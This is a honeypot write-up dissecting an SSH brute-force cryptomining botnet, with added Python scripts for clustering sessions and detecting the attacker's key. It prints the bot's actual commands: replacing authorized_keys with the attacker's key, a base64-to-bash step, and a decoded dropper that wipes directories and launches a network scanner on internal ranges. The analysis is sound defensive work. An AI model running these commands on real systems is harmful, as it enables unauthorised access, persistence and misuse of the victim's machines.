This botnet used SSH commands to analyze the victim machine and then downloaded a payload using SFTP. The botnet was able to get in using the credentials root:1qaz@WSX. I had set up this particular login because I had seen that it was being used by other attackers. If you look at your keyboard, you can see why people would set their password to 1qaz@WSX. I saw 280 unique IP addresses run the exact same commands 810 times (most importantly, adding the same SSH key), leading me to believe that they are part of the same botnet. Immediately after logging in, they tried the credentials knockknockwhosthere:knockknockwhosthere. This is most likely used to detect honeypots that allow all username/password combinations.
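The grouping used above (the same command sequence arriving from many source addresses, so one script driving many bots) can be automated over the honeypot's own logs. The script below is an added example and not code from the original post: it assumes Cowrie's JSON log format (one event per line with eventid, session, src_ip and, for cowrie.command.input events, the typed command in input), normalises the one part of the sequence that changes per session (the chpasswd password), and counts runs and unique IPs per command-sequence fingerprint. The log lines it runs on are constructed for the example, not real captures.

```python
"""Cluster honeypot SSH sessions by the commands they run.

Added example, not code from the original post. It assumes Cowrie's JSON
log format (one event per line with "eventid", "session", "src_ip" and,
for cowrie.command.input events, the typed command in "input"). The log
below is constructed for the example; it is not a real capture.
"""
import hashlib
import json
import re
from collections import defaultdict

# Parts of a command that differ per session without changing what the bot
# does. The post notes every session set a different root password.
VARIABLE_PARTS = [
    (re.compile(r'echo "root:[^"]*"\|chpasswd'), 'echo "root:<PW>"|chpasswd'),
]


def normalize(cmd):
    """Canonicalise one command so per-session noise does not split a cluster."""
    cmd = " ".join(cmd.split())
    for pattern, repl in VARIABLE_PARTS:
        cmd = pattern.sub(repl, cmd)
    return cmd


def parse_sessions(log_text):
    """Return {session_id: (src_ip, [normalized commands in order])}."""
    sessions = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("eventid") != "cowrie.command.input":
            continue  # logins, downloads etc. are not part of the fingerprint
        _, cmds = sessions.setdefault(ev["session"], (ev.get("src_ip"), []))
        cmds.append(normalize(ev["input"]))
    return sessions


def fingerprint(cmds):
    """Short stable id for an ordered command sequence."""
    return hashlib.sha256("\n".join(cmds).encode()).hexdigest()[:12]


def cluster_sessions(log_text):
    """Group sessions by fingerprint: {fp: {"runs": n, "ips": {...}, "commands": [...]}}."""
    clusters = defaultdict(lambda: {"runs": 0, "ips": set(), "commands": None})
    for src_ip, cmds in parse_sessions(log_text).values():
        c = clusters[fingerprint(cmds)]
        c["runs"] += 1
        c["ips"].add(src_ip)
        c["commands"] = cmds
    return dict(clusters)


def botnet_candidates(clusters, min_ips=2):
    """Keep clusters seen from several distinct IPs: one script, many bots."""
    return {fp: c for fp, c in clusters.items() if len(c["ips"]) >= min_ips}


# --- constructed sample log (not a real capture) ---------------------------
BOT_SEQUENCE = [
    "cat /proc/cpuinfo | grep name | wc -l",
    'echo "root:{pw}"|chpasswd|bash',
    "uname -m",
    'cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAA...== mdrfckr"'
    ">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
]


def _session(sid, ip, cmds, user="root", pw="1qaz@WSX"):
    events = [{"eventid": "cowrie.login.success", "session": sid, "src_ip": ip,
               "username": user, "password": pw}]
    events += [{"eventid": "cowrie.command.input", "session": sid, "src_ip": ip,
                "input": c} for c in cmds]
    return events


_EVENTS = []
# Four runs of the bot script from three addresses, each with its own password.
for sid, ip, pw in [("s1", "203.0.113.10", "f5zlK5cYjpkk"), ("s2", "198.51.100.7", "Qx9s1Lp0zz"),
                    ("s3", "203.0.113.10", "Zk3mT7vWq1"), ("s4", "192.0.2.44", "bb81LkPo2m")]:
    _EVENTS += _session(sid, ip, [c.format(pw=pw) for c in BOT_SEQUENCE])
# One unrelated, manual-looking session.
_EVENTS += _session("s5", "198.51.100.200", ["uname -a", "cat /etc/passwd"])
SAMPLE_LOG = "\n".join(json.dumps(e) for e in _EVENTS)

if __name__ == "__main__":
    for fp, c in botnet_candidates(cluster_sessions(SAMPLE_LOG)).items():
        print(f"{fp}: {c['runs']} runs from {len(c['ips'])} unique IPs")
        for cmd in c["commands"]:
            print("   ", cmd)
```

Run it against a real cowrie.json instead of SAMPLE_LOG and the cluster with hundreds of distinct IPs and one identical command list is the botnet; the VARIABLE_PARTS list is where you add any other per-session noise (random file names, scan targets) you see splitting one campaign into many fingerprints.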
After logging into my honeypot, they ran the following commands:
cat /proc/cpuinfo | grep name | wc -l
echo "root:f5zlK5cYjpkk"|chpasswd|bash
# They all set a slightly different password with this one
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
ls -lh $(which ls)
which ls
crontab -l
w
uname -m
cat /proc/cpuinfo | grep model | grep name | wc -l
free -m -h | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
top
uname
uname -m
lscpu | grep Model
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
I would guess that this botnet is for cryptocurrency mining, given that it checks how many CPU cores I have, the available memory, what is running, and what architecture and CPU model I have. After doing these checks, it removes all existing SSH keys and adds its own. (Update: the botnet seems to have been updated, and now uses >> instead of >.) At first the botnet was not dropping a payload, so I changed Cowrie's default /proc/cpuinfo, /proc/meminfo, and lscpu output. By default, Cowrie makes meminfo and cpuinfo look like a Core Duo with 4G of RAM, not a great target for cryptocurrency mining malware. I also made a small change to Cowrie that allows any public key to log in (it ended up being only one line of code!). After making these changes, the botnet now downloads a file called dota3.tar.gz (2.7M). It then runs these commands:
cat /var/tmp/.systemcache436621
rm -rf /var/tmp/dota*
cat /var/tmp/.systemcache436621
echo "1" > /var/tmp/.systemcache436621
cat /var/tmp/.systemcache436621
sleep 15s && cd /var/tmp; echo "..." | base64 --decode | bash
I am not sure what it's doing with the file .systemcache436621. It may just be a check to see if this machine has been infected before. Then the bot sends base64-encoded commands, which decode to:
#!/bin/bash
cd /tmp
rm -rf .ssh
rm -rf .mountfs
rm -rf .X13-unix
rm -rf .X17-unix
rm -rf .X19-unix
rm -rf .X2*
mkdir .X25-unix
cd .X25-unix
mv /var/tmp/dota3.tar.gz dota3.tar.gz
tar xf dota3.tar.gz
sleep 3s && cd /tmp/.X25-unix/.rsync/c
nohup /tmp/.X25-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
sleep 8m && nohup /tmp/.X25-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&
sleep 20m && cd ..; /tmp/.X25-unix/.rsync/initall 2>1&
exit 0
A neat trick that this botnet employs is that when you untar the file, you get an error message. The archive looks incomplete, and tar fails after creating the directory .rsync. Unless you saw that the bot cd'd into /tmp/.X25-unix/.rsync/c or used "tar -v" (verbose), it would be hard to know the archive actually did contain something. Contained in .rsync were some bash scripts and binaries.
Doing a quick Google search on "mdrfckr" and the attacker's key ("AAAAB3...") gives quite a few results. I found an article detailing malware from a group called "Outlaw" which used SSH brute force and the Shellshock vulnerability to spread. The article describes the malware as installing "a complete hacking suite, composed of an IRC bot, an SSH scanner, a brute force tool, and an XMRIG crypto-miner". There was also someone on AskUbuntu who could not figure out why a "Strange Cron Job Takes up 100% of CPU".
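The public key is the most durable indicator in all of this: the dropper name, the comment and the per-session password can change, but every bot installs the same key. The script below is an added example, not code from the post or from the malware. It decodes the base64 blob quoted above using the SSH wire format (key type, then for ssh-rsa the exponent and modulus), computes the SHA256 fingerprint that ssh-keygen -lf would print, and flags any authorized_keys line carrying that blob. The sample authorized_keys content, the decoy ed25519 key and the paths scanned under __main__ are constructed for the example.

```python
"""Check authorized_keys files for the key this botnet installs.

Added example, not code from the original post. The key blob is the one the
post shows the bot appending (the "mdrfckr" key). The decoy key, the sample
authorized_keys content and the paths scanned in __main__ are constructed
for the example.
"""
import base64
import glob
import hashlib
import struct

# Base64 blob of the bot's key, copied from the command in the post. Match on
# the blob, not on the "mdrfckr" comment: the comment is attacker-chosen text.
OUTLAW_KEY_BLOB = (
    "AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4"
    "KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8"
    "NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx"
    "1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpg"
    "LMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4"
    "Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WE"
    "QHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFn"
    "vlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTT"
    "WYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAy"
    "SVKPRK+oRw=="
)
KNOWN_BAD_BLOBS = {OUTLAW_KEY_BLOB}
KEY_TYPE_PREFIXES = ("ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-", "sk-")


def ssh_fingerprint(blob_b64):
    """SHA256 fingerprint in the form `ssh-keygen -lf` prints (unpadded base64)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def _read_string(buf, off):
    """One SSH wire-format string: uint32 big-endian length, then that many bytes."""
    (length,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + length], off + 4 + length


def describe_key(blob_b64):
    """Decode the key type and, for ssh-rsa, the public exponent and modulus size.

    Layout per RFC 4253 s6.6: string "ssh-rsa", mpint e, mpint n. OpenSSH's
    ssh-keygen uses e=65537; PuTTYgen has used e=37, which is what this key has.
    """
    raw = base64.b64decode(blob_b64)
    ktype, off = _read_string(raw, 0)
    info = {"type": ktype.decode("ascii", "replace")}
    if ktype == b"ssh-rsa":
        e, off = _read_string(raw, off)
        n, off = _read_string(raw, off)
        info["e"] = int.from_bytes(e, "big")
        info["bits"] = int.from_bytes(n, "big").bit_length()
    return info


def parse_authorized_keys(text):
    """Yield (lineno, keytype, blob, comment) per key line; skips blanks and # comments."""
    for lineno, line in enumerate(text.splitlines(), 1):
        tokens = line.strip().split()
        if not tokens or tokens[0].startswith("#"):
            continue
        # A line may start with options (command="...",no-pty ...); take the first
        # token that looks like a key type and the blob that follows it.
        for i, tok in enumerate(tokens[:-1]):
            if tok.startswith(KEY_TYPE_PREFIXES):
                yield lineno, tok, tokens[i + 1], " ".join(tokens[i + 2:])
                break


def find_known_bad_keys(text, bad_blobs=KNOWN_BAD_BLOBS):
    """One finding per authorized_keys line whose blob is a known indicator."""
    findings = []
    for lineno, ktype, blob, comment in parse_authorized_keys(text):
        if blob in bad_blobs:
            finding = describe_key(blob)
            finding.update(line=lineno, comment=comment, fingerprint=ssh_fingerprint(blob))
            findings.append(finding)
    return findings


# Constructed sample: an admin key, a restricted backup key with options, and the
# bot's key as the post shows it being appended. The ed25519 blob is synthetic.
_DECOY_ED25519 = base64.b64encode(
    b"\x00\x00\x00\x0bssh-ed25519" + b"\x00\x00\x00\x20" + bytes(range(32))).decode()
SAMPLE_AUTHORIZED_KEYS = f"""# admin workstation
ssh-ed25519 {_DECOY_ED25519} admin@example
command="/usr/bin/rrsync /srv",no-pty ssh-ed25519 {_DECOY_ED25519} backup
ssh-rsa {OUTLAW_KEY_BLOB} mdrfckr
"""

if __name__ == "__main__":
    # Usual locations; the post does not name paths, these are the common defaults.
    paths = ["/root/.ssh/authorized_keys"] + glob.glob("/home/*/.ssh/authorized_keys")
    for path in paths:
        try:
            with open(path) as fh:
                text = fh.read()
        except OSError:
            continue
        for f in find_known_bad_keys(text):
            print(f"{path}:{f['line']}: {f['type']} {f['fingerprint']} "
                  f"e={f.get('e')} bits={f.get('bits')} comment={f['comment']!r}")
```

Matching on the blob rather than on the comment matters because "mdrfckr" is free text the operator can change at will; the fingerprint the script prints is what you compare against `ssh-keygen -lf ~/.ssh/authorized_keys` on a suspect host. The decoded parameters are a small extra clue: a 2048-bit RSA key with public exponent 37 was not made by OpenSSH's ssh-keygen, which uses 65537.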